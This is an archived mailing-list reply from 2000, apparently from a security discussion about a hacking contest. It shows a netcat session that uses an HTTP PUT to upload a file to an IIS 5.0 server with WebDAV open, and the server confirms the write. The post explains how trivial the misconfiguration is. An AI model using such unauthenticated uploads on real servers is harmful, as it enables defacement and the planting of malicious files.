Re: Kill the DOG and win 100 000 DM

[Jon Larimer <jlarimer () HTML NET>]

On Wed, 8 Nov 2000, Scott Fagg wrote:

> I'm not sure what the syntax for POST or PUT is.  Anyone one know the WEBDAV commands?
>
> There must be a list of these somewhere....

booberry:~$ nc 208.21.4.154 80
PUT /hi.txt HTTP/1.0
Content-length: 3

hi!
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Wed, 08 Nov 2000 15:01:53 GMT
Location: http://208.21.4.154/hi.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,
PROPPATCH, SEARCH, LOCK, UNLOCK

This is the "0-day exploit" that pimpshiz uses to hack really really
poorly configured websites. For info on how to use the other WebDAV stuff,
check out
http://msdn.microsoft.com/library/default.asp?URL=/library/psdk/exchsv2k/_webdav_web_store_http_webdav_protocol_reference.htm


-jon